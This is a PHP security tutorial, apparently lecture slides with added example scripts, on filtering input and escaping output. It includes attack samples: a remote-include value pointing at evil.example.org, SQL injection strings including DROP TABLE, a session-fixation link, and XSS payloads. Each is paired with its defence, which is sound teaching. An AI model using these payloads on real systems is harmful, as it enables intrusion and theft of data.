PHP Security
Two Golden Rules
1. FILTER external input. Obvious: $_POST, $_COOKIE, etc. Less obvious: $_SERVER, much of which (HTTP_REFERER, HTTP_USER_AGENT, any HTTP_* header) is supplied by the client and is just as untrusted.
2. ESCAPE output, for whichever system is going to consume it: the client browser (xhtml) or the MySQL database.
Two Golden Rules [diagram: external data (Cookie, Forms, Referer, etc.) -> Filter -> PHP Script -> Escape -> output (xhtml to the browser, MySQL)]
Filtering: the process by which you inspect data to prove its validity. Adopt a whitelist approach wherever possible: assume the data is invalid unless you can prove otherwise. Filtering is useless unless you can keep track of what has been filtered and what hasn't, so keep filtered values in a separate array and never read from the raw superglobals again once the filter has run.
Filter example
    $clean = array();                                // Initialise an array to store filtered data.
    if (isset($_POST['username'])                    // A spoofed request may omit the field,
        && is_string($_POST['username'])             // or send username[]=... so it arrives as an array.
        && ctype_alnum($_POST['username'])) {        // Inspect username to make sure that it is alphanumeric.
        $clean['username'] = $_POST['username'];     // If it is, store it in the array.
    }
From here on, read the username only from $clean; anything still in $_POST is unfiltered.
Escaping Output: the process by which you escape characters that have a special meaning on the receiving system. Unless you're sending data somewhere unusual, there is probably a function that does this for you. The two most common outputs are xhtml to the browser (use htmlentities() or htmlspecialchars(), always with ENT_QUOTES) and a MySQL database. The deck's mysql_real_escape_string() belongs to the old mysql extension, which was removed in PHP 7; use mysqli_real_escape_string() on an open connection or, better, prepared statements. Escape for the destination, not the source: the same filtered value needs different escaping for the browser and for the database.
Escape example
    $xhtml = array();                                                         // Initialise an array for storing escaped data.
    $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); // Escape the filtered username and store it in the array.
    echo "<p>Welcome back, {$xhtml['username']}.</p>";                       // Send the filtered and escaped username to the client.
(Only reached when the filter stored a username in $clean.)
That's it! If you follow these two rules consistently, you will produce code that is hard to break. If you don't, you will be susceptible to the common attack methods that follow. Next: COMMON ATTACK METHODS
Register Globals: Eh? With register_globals on, every index of the request superglobals is also available as a plain variable name, e.g. in your scripts $_POST['name'] is available as $name and $_COOKIE['age'] as $age. The option has defaulted to off since PHP 4.2, was deprecated in 5.3 and removed in 5.4, but if you must support older installations, make sure your code is secure when it is turned on.
Register Globals: Example
    <?php include "$path/script.php"; ?>
If you forget to initialise $path and register_globals is enabled, the page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string, which makes this example equivalent to:
    include 'http://evil.example.org/?/script.php';
i.e. a malicious user can include any script in your code. (Fetching the include over HTTP also needs allow_url_fopen and, from PHP 5.2, allow_url_include to be on; with those off, the same bug still lets the attacker include any local file whose path they can control.)
Register Globals: Solution. Be aware that with register_globals on, any user can inject a variable of any name into your PHP scripts. ALWAYS EXPLICITLY INITIALISE YOUR OWN VARIABLES, and on PHP older than 5.4 set register_globals = Off in php.ini.
Spoofed Forms: Eh? Be aware that anybody can write their own forms and submit them to your PHP scripts.  For example, using a select, checkbox or radio button form input does not guarantee that the data submitted will be one of  your  chosen options…
Spoofed Forms: Example
The form written by the web developer, submitted to the page:
    <form action="/process.php" method="POST">
      <select name="colour">
        <option value="red">red</option>
        <option value="green">green</option>
        <option value="blue">blue</option>
      </select>
      <input type="submit" />
    </form>
The user writes their own form that submits to the same page, with a free-text field in place of the select:
    <form action="http://example.org/process.php" method="POST">
      <input type="text" name="colour" />
      <input type="submit" />
    </form>
Spoofed Forms: Solution. Users can submit whatever they like to your PHP page, and it will be accepted as long as it conforms to your rules. Make sure all your rules are checked by your PHP input filter; don't rely on the form (or on client-side JavaScript) to enforce them, because both can be changed. The same applies to hidden fields, maxlength attributes and disabled controls.
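The filter the solution calls for, as an added example that is not part of the original deck: the colour field is checked against a server-side whitelist, and the cases a spoofed form can produce (missing field, array instead of string, free text) are all rejected. $_POST is stood in for by constructed submissions so the script runs from the command line; it assumes PHP 7.1 or later for the nullable return type.

```php
<?php
// Added example (not from the original slides): server-side whitelist filtering
// of a spoofed form field. The submissions below are constructed stand-ins for
// real POST bodies; in a real request PHP fills $_POST itself.

// Allowed values come from the developer's <select>, never from the request.
const ALLOWED_COLOURS = ['red', 'green', 'blue'];

/**
 * Return the filtered colour, or null if the submitted value is not one of ours.
 * - Missing key: a spoofed form may simply omit the field.
 * - Non-string: a spoofed form can send colour[]=red, which arrives as an array.
 * - Strict in_array(): avoids PHP's loose-comparison surprises
 *   (before PHP 8, 0 == 'red' is true).
 */
function filter_colour(array $post): ?string
{
    if (!isset($post['colour']) || !is_string($post['colour'])) {
        return null;
    }
    return in_array($post['colour'], ALLOWED_COLOURS, true) ? $post['colour'] : null;
}

// Constructed submissions standing in for real POST bodies.
$submissions = [
    'legitimate'    => ['colour' => 'green'],
    'spoofed text'  => ['colour' => "purple'; DROP TABLE orders; --"],
    'spoofed array' => ['colour' => ['red']],
    'missing field' => [],
];

$clean = [];
foreach ($submissions as $label => $post) {
    $colour = filter_colour($post);
    if ($colour === null) {
        // Reject, log, or redisplay the form; never fall back to the raw value.
        printf("%-14s rejected\n", $label);
        continue;
    }
    $clean['colour'] = $colour;   // only whitelisted values ever reach $clean
    printf("%-14s accepted: %s\n", $label, $clean['colour']);
}
```

Only the first submission is accepted; the other three are rejected before any of them could reach a query or the page output.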
Session Fixation: Eh? Session attacks nearly always involve impersonation: the malicious user is trying to take over someone else's session on your site. The crucial piece of information is the session id, and session fixation is a technique for making the victim use an id the attacker already knows, so there is nothing to steal afterwards.
Session Fixation: Eh? 1. The malicious user hosts a page with links to your site, or emails spam links to your site, with a session id already set:
    <a href="http://example.com/index.php?PHPSESSID=1234">...</a>
(This only works if PHP will accept an id from the URL, i.e. session.use_only_cookies is off or session.use_trans_sid is on.)
Session Fixation: Eh? 2. A client follows one of these links, is directed to your site, and logs in. 3. Now the malicious user knows the session id (they set it!) and can hijack the session by browsing to your site with the same id. 4. The malicious user is now logged in as one of your legitimate clients. Ooops.
Session Fixation: Solution To protect against this type of attack, first consider that hijacking a session is only really useful after the user has logged in or otherwise obtained a heightened level of privilege. If we  regenerate the session identifier whenever there is any change in privilege level  (for example, after verifying a username and password), we will have practically eliminated the risk of a successful session fixation attack.
Session Fixation: Solution. session_regenerate_id(): conveniently, PHP has a function that does all the work for you and issues a fresh session id. Call it at every change in privilege level, immediately after the credentials check succeeds and before anything is written to the session. Pass true so the old session data is deleted rather than left reachable under the attacker's id, and set session.use_only_cookies = 1 (and, on PHP 5.5.2 or later, session.use_strict_mode = 1) so an id planted in a URL is never accepted in the first place.
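The login handler the solution describes, as an added example that is not part of the original deck: the session id is regenerated at the moment the user's privilege changes, and the session settings that stop PHP accepting an attacker-chosen id are set before the session starts. The user table and the login request are constructed inline so the script is self-contained; a real application reads the password hash from its database.

```php
<?php
// Added example (not from the original slides): a login handler that regenerates
// the session id at the moment privilege changes, plus the session settings that
// stop PHP from accepting an id the attacker chose. The user table is constructed
// inline; a real application reads the password hash from its database.

ini_set('session.use_only_cookies', '1');  // ignore ?PHPSESSID=... in the URL
ini_set('session.use_trans_sid', '0');     // never rewrite links to carry the id
ini_set('session.use_strict_mode', '1');   // PHP >= 5.5.2: refuse ids the server never issued
ini_set('session.cookie_httponly', '1');   // keep the cookie out of reach of injected script
session_start();

// Constructed user table (hash generated here so the script is self-contained).
$users = ['alice' => password_hash('correct horse battery staple', PASSWORD_DEFAULT)];

function login(array $users, string $user, string $password): bool
{
    if (!isset($users[$user]) || !password_verify($password, $users[$user])) {
        return false;
    }
    // The privilege level is about to change: discard whatever id the client
    // arrived with. true deletes the old session data, so an id an attacker
    // planted is left pointing at nothing rather than at the new login.
    session_regenerate_id(true);
    $_SESSION['user'] = $user;
    $_SESSION['logged_in_at'] = time();
    return true;
}

function logout(): void
{
    // Privilege drops here too: empty the data and destroy the session.
    $_SESSION = [];
    session_destroy();
}

// Simulated login request; in production $_POST is filled by the real form.
$post = ['username' => 'alice', 'password' => 'correct horse battery staple'];

$before = session_id();
if (login($users, $post['username'], $post['password'])) {
    printf("logged in as %s; session id changed: %s\n",
        $_SESSION['user'], $before !== session_id() ? 'yes' : 'no');
} else {
    echo "login failed\n";
}
```

Whatever id the browser presented before login ($before) is invalid afterwards, so a fixed id buys the attacker nothing; with use_strict_mode on, an id the server never issued is replaced even before the login step.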
SQL Injection: Eh? The goal of SQL injection is to insert arbitrary data, most often a fragment of SQL, into a string that's eventually executed by the database, so that user input becomes part of the query's grammar rather than a value.
SQL Injection: Example. Consider this query executed in PHP against a MySQL db, where the email text has been submitted by the user:
    "SELECT * FROM members WHERE email = '{$_POST['email']}'"
The use of $_POST[..] in the query should immediately raise warning flags. Consider a user submitting the following email:
    dummy' OR 'x'='x
The query now becomes
    SELECT * FROM members WHERE email = 'dummy' OR 'x'='x'
..which will return the details of all members!
SQL Injection: Solution. Filter input data. Quote your data: if your database allows it (MySQL does), put single quotes around all values in your SQL statements, regardless of the data type, because escaping only protects values inside quotes. Escape your data: for a MySQL db the deck used mysql_real_escape_string(), which was removed with the mysql extension in PHP 7; use mysqli_real_escape_string() on an open connection (after setting the connection charset, so the escaping matches the encoding MySQL will use). Better still, use prepared statements (PDO or mysqli) so values are sent separately from the query text and no escaping step can be forgotten.
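The query from the example run both ways, as an added example that is not part of the original deck: the string-built query beside a PDO prepared statement. It uses an in-memory SQLite database instead of MySQL so it runs offline (assumes the pdo_sqlite extension is loaded); the members table and its two rows are constructed here, and the injection behaves identically on MySQL.

```php
<?php
// Added example (not from the original slides): the vulnerable string-built query
// from the slide beside a parameterised one, run against an in-memory SQLite
// database via PDO so it works offline. Assumes the pdo_sqlite extension; the
// members table and rows are constructed here for the demonstration.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, email TEXT NOT NULL)');
$pdo->exec("INSERT INTO members (email) VALUES ('alice@example.org'), ('bob@example.org')");

// The attacker's "email" from the slide.
$email = "dummy' OR 'x'='x";

// 1. Vulnerable: the input is pasted into the SQL text and becomes grammar.
function lookup_vulnerable(PDO $pdo, string $email): array
{
    $sql = "SELECT * FROM members WHERE email = '{$email}'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// 2. Hardened: the input is bound as a value; the query text never changes,
//    so quotes inside the value cannot end the literal.
function lookup_prepared(PDO $pdo, string $email): array
{
    $stmt = $pdo->prepare('SELECT * FROM members WHERE email = ?');
    $stmt->execute([$email]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

printf("vulnerable: %d row(s)\n", count(lookup_vulnerable($pdo, $email))); // 2: every member
printf("prepared:   %d row(s)\n", count(lookup_prepared($pdo, $email)));   // 0: no such email
```

The vulnerable function returns both members because the payload turned the WHERE clause into `email = 'dummy' OR 'x'='x'`; the prepared statement looks for a member whose email is literally `dummy' OR 'x'='x` and finds none.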
Accessing Credentials Sometimes you need to store sensitive data on your server such as database passwords, usernames, etc.  There are various options…
Accessing Credentials, from worst to best:
1. Worst: don't store passwords in an included file without a *.php extension inside a web accessible directory. The web server will happily serve it as plain text to anyone who guesses the name.
2. You can store them in a *.php file under the document root (i.e. web accessible). OK, but not great: if PHP stops being executed for that directory (a misconfiguration, a failed module, a backup copy saved as .php~ or .bak), the file is served as plain text to the entire world.
3. Better: keep as much code as possible, including the definition of passwords, in included files outside the web accessible directories.
4. Best: with an Apache server there are various techniques (e.g. SetEnv in the server configuration) to supply passwords and usernames as environment variables, which PHP reads through the $_SERVER superglobal or getenv(); the secret then never sits in a file under the site at all.
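A loader that follows this ordering, as an added example that is not part of the original deck: it prefers environment variables, falls back to a PHP file outside the document root, and refuses to load a file that sits under DocumentRoot. The path, the variable names DB_USER and DB_PASSWORD, the Apache SetEnv lines mentioned in the comments and the config file layout are assumptions for illustration; the script runs once either the variables are set or the file exists.

```php
<?php
// Added example (not from the original slides): loading database credentials
// from outside the web root, with an environment-variable override. The paths,
// variable names (DB_USER, DB_PASSWORD) and the Apache SetEnv lines named below
// are assumptions for illustration, not settings the original deck specifies.

/**
 * Resolve credentials in order of preference:
 *   1. environment variables, e.g. set in httpd.conf with
 *        SetEnv DB_USER app
 *        SetEnv DB_PASSWORD s3cret
 *      and visible to PHP through getenv() and $_SERVER;
 *   2. a PHP file outside DocumentRoot that returns an array.
 * Refuses a config file under the document root, because a parser failure or
 * misconfiguration would serve it as plain text.
 */
function load_db_credentials(string $configFile): array
{
    $user = getenv('DB_USER');
    $pass = getenv('DB_PASSWORD');
    if ($user !== false && $pass !== false) {
        return ['user' => $user, 'password' => $pass];
    }

    $real = realpath($configFile);
    if ($real === false) {
        throw new RuntimeException("config file not found: $configFile");
    }
    $docRoot = isset($_SERVER['DOCUMENT_ROOT']) ? realpath($_SERVER['DOCUMENT_ROOT']) : false;
    if ($docRoot !== false && strpos($real, $docRoot . DIRECTORY_SEPARATOR) === 0) {
        throw new RuntimeException("refusing to load credentials from inside the web root: $real");
    }

    // The file contains only: <?php return ['user' => '...', 'password' => '...'];
    $config = require $real;
    if (!is_array($config) || !isset($config['user'], $config['password'])) {
        throw new RuntimeException('config file must return user and password');
    }
    return ['user' => $config['user'], 'password' => $config['password']];
}

// Assumed layout: /var/www/app/public is DocumentRoot; config sits one level up.
$creds = load_db_credentials(__DIR__ . '/../config/db.php');
$pdo = new PDO('mysql:host=localhost;dbname=app', $creds['user'], $creds['password']);
```

The DOCUMENT_ROOT check is a safety net for option 2 on the slide: it turns "the config file was accidentally put under the site" into a hard failure at startup instead of a silent disclosure later.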
Cross-Site Scripting (XSS). This is a good example of why you should always escape all output, even for xhtml:
    echo "<p>Welcome back, {$_GET['username']}.</p>";
becomes, with a crafted username,
    echo "<p>Welcome back, <script>...</script>.</p>";
and the attacker's script runs in every visitor's browser with your page's origin.
XSS: The Solution. And again: filter input, escape output, with ENT_QUOTES so the value is also safe inside attribute values. Be especially careful if you are writing user input to a file which is later include'd into your page: without checking, the user can write their own PHP for inclusion, and no amount of HTML escaping helps once the file is executed as code.
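The vulnerable echo from the slide beside its escaped form, as an added example that is not part of the original deck, run over two constructed payloads. It shows the case the deck's ENT_QUOTES argument exists for: a value reused inside a single-quoted attribute, which htmlentities() and htmlspecialchars() left unescaped by default before PHP 8.1.

```php
<?php
// Added example (not from the original slides): the vulnerable echo from the
// slide beside its escaped form, with constructed attacker input. Shows why
// ENT_QUOTES matters in attribute context: before PHP 8.1 htmlentities() and
// htmlspecialchars() left single quotes alone by default.

// Constructed payloads in place of a real $_GET['username'].
$payloads = [
    'script tag'         => '<script>alert(1)</script>',
    'attribute breakout' => "x' onmouseover='alert(1)",
];

function e(string $s): string
{
    // ENT_QUOTES: escape both quote styles so the value is safe in single- or
    // double-quoted attributes as well as in element content.
    // ENT_SUBSTITUTE: replace invalid UTF-8 instead of returning '' (which
    // would silently drop the whole string).
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_vulnerable(string $username): string
{
    return "<p>Welcome back, {$username}.</p>";
}

function render_escaped(string $username): string
{
    $safe = e($username);
    // The same escaped value is valid in both places it is used.
    return "<p title='{$safe}'>Welcome back, {$safe}.</p>";
}

foreach ($payloads as $label => $p) {
    echo "--- {$label}\n";
    echo "vulnerable: ", render_vulnerable($p), "\n";
    echo "escaped:    ", render_escaped($p), "\n";
}
```

For the second payload the escaped output contains `x&#039; onmouseover=&#039;alert(1)`, so the attribute is never closed; with ENT_COMPAT (the pre-8.1 default) the single quote would survive and the handler would be injected. HTML escaping is only right for HTML contexts: a value placed inside a `<script>` block or a URL needs escaping for that context instead.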
The 'magic' of PHP. Older versions of PHP tried to tighten security with 'magic quotes': when turned on, PHP automatically escaped quotation marks and backslashes in all incoming data. Although this looked helpful for beginners, it cannot be relied upon if you want to write portable code, it escaped for MySQL only, and it was deprecated in PHP 5.3 and removed in 5.4. http://docs.php.net/en/security.magicquotes.html
The 'magic' of PHP: banished! On PHP older than 5.4, to know where you are starting from, use get_magic_quotes_gpc() to tell whether they are on or off, and use stripslashes() to remove any escape characters 'magic quotes' added, so that your own filtering and escaping start from a consistent point. The function was removed in PHP 8.0, so guard the call:
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        $thing = stripslashes($_POST['thing']);   // undo magic quotes, then filter as usual
    } else {
        $thing = $_POST['thing'];
    }
(For array inputs such as thing[], apply stripslashes() recursively to every element.)
Phew.. But don't panic! Open Source PHP code needs to be rock solid in terms of security, as everyone can read the source. Bespoke code gets less scrutiny, but do not count on that: every attack above is found by sending crafted input and watching the response, without ever seeing the source. Apply the two rules regardless.
Review Filter Input  + Escape Output = Secure Code
12-security.ppt - PHP and Arabic Language - Index
